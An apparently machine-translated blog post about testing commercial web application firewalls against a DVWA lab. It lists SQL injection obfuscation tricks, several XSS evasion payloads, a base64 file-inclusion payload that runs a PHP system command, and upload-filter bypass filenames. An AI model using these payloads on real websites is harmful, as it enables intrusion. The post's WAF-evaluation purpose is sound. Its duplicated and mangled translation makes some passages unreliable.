Published on September 16, 2016 | classified as safety related | reading times
Many colleagues on the Internet have published articles to discuss various skills around WAF, and many articles share ideas of self-study of WAF. As the safety engineer of Party A in the traditional industry, I try to write down my general idea of WAF type selection test. On the one hand, it is a summary of the completion of a project, on the other hand, it also provides a different perspective to see WAF, hoping to help Party B's friends design and optimize WAF products in the future.
0x01 test ideas
- Environment building server: use DVWA to build a set of websites containing various vulnerabilities, and open access logs for analysis. DVWA construction process is not detailed. WAF: reverse proxy deployment. The DVWA server is used as the reverse proxy to reflect the vs IP. During the test, all payloads are sent to vs IP, which is processed by WAF and then delivered to DVWA server.
- Server: use DVWA to build a set of websites containing various vulnerabilities, and open access logs for analysis. DVWA construction process is not detailed.
- WAF: reverse proxy deployment. The DVWA server is used as the reverse proxy to reflect the vs IP. During the test, all payloads are sent to vs IP, which is processed by WAF and then delivered to DVWA server.
- Test method: the client constructs a payload and submits it to vs IP, and the server views the access log. If it is effectively identified and filtered, the access log should have no relevant content.
0x02 OWASP TOP10 general defense
- Sqliget type injection: the parameter ID of http://10.44.100.18/dvwa/vulnerabilities/sqli/? Id = 22 & submit = submit ා, can be injected, just construct payload submission. Post injection: during DVWA login, burpsuite is used to capture packets, and post injection can be constructed.
- Get type injection: the parameter ID of http://10.44.100.18/dvwa/vulnerabilities/sqli/? Id = 22 & submit = submit ා can be injected, just construct payload submission.
- Post injection: during DVWA login, burpsuite is used to capture packets, and post injection can be constructed.
- XSS reflection type XSS and storage type XSS are both available in DVWA, so it is enough to construct payload.
- Reflection type XSS and storage type XSS are both available in DVWA, so it is enough to construct payload.
- CSRF, command injection, brute foce, file upload and other methods are available for DVWA, not to elaborate.
- What is missing is SSRF, deserialization, structs, heart bleeding. These attacks are not designed in the current version of DVWA and need to be considered separately.
0x03 defense around technology
In addition to the defense of the most common attack tactics, WAF should also have the ability to recognize the distorted payload. At present, commercial WAF at home and abroad can recognize more than 99% of the conventional attack methods, the difference is mainly reflected in the analysis ability of various types of encoded distorted payload. There are two kinds of ideas.
Idea 1:
After the WAF grabs the HTTP packet, it performs multiple decoding, extracts the regular result of each decoding, and matches with the feature library. There will be differences in the number of layers that can be decoded. The ASM of F5 can support up to 5 layers and allow users to manually set the number of layers. Others can not specify the number of decoding layers, but they all have corresponding capabilities.
Train of thought two:
Considering that regular matching is prone to false positives and false positives, some manufacturers give up this analysis mode and do semantic analysis instead. This is the case with sqlchop of Changting technology. Details can be read as follows: sqlshop, a new SQL injection detection engine, needs to manually code and transform the payload during the test. In detail:
SQLi deformation
- URLEncode Code: don't underestimate this common bypass method, some manufacturers' WAF really can't detect it.
- Unicode encoding
- Keyword case replacement: This is more conventional, basically there is no undetectable.
- Key to hex
- Key words in back Quotes
- Keywords are introduced with / ×! × / comments
- Keyword is truncated with / ×× / comment: sel ect to sel / * * / ECT
- Key truncated with% 00
- In the submitted HTTP package, change x-originating-ip to 127.0.0.1
- In the submitted HTTP package, change x-remote-addr to 127.0.0.1
- Sqlmap's various tampers, try one by one
XSS deformation
XSS has the most deformation and WAF has the most serious omission. Who makes HTML use so many tags. The test of this block depends on the amount of XSS payloads collected by testers. I will list only a few common ones for reference:
One
Two
Three
Four
Five
Six
Seven
Eight
<embed/src=//goo.gl/nlX0P>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<a onmouseover="javascript:window.onerror=alert;throw 1>
<svg><script>varmyvar="YourInput";</script></svg>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<script>//@cc_on!alert(1)/*@cc_on~alert(2)@*/</script>
<marquee/onstart=confirm(2)>/
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>XSS
File contains bypass
One
data:text/plain;base64,ZGF0YTp0ZXh0L3BsYWluLDw/cGhwIHN5c3RlbSgnY2F0IC92YXIvd3d3L0ZpbGVJbmNsdWRlLnBocCcpPz4=
File upload bypass
The main considerations for file upload bypass are as follows:
- 123.php.123
- 123.asp;.Gif
- as.php%00.gif
- Add gif89a at the beginning of the file
- Content type: image / jpeg
###The 0x03 scanner defense capability WAF should have the ability to identify the scanner according to the characteristics of the data package and prevent it. Common scanners, such as WVS, sqlmap, netspacer, havij, and appscan, should be used to actually test WAF responses. It should be noted that WAF should not only intercept the packets sent by the scanner, but also indicate in the log what kind of scanner the attacker uses. This is very helpful for the operation and maintenance personnel to analyze the logs. For example, in the actual test, Imperva can accurately identify sqlmap and netsparker. The ASM of F5 can accurately identify WVS and sqlmap. Fortiweb does not have this capability.
The remaining chapters will discuss the following:
- Webshell communication interception test
- Other small function point tests
- Safety test of equipment
- Self learning mode test
- WAF test tool
- WAF management and maintenance function test unfinished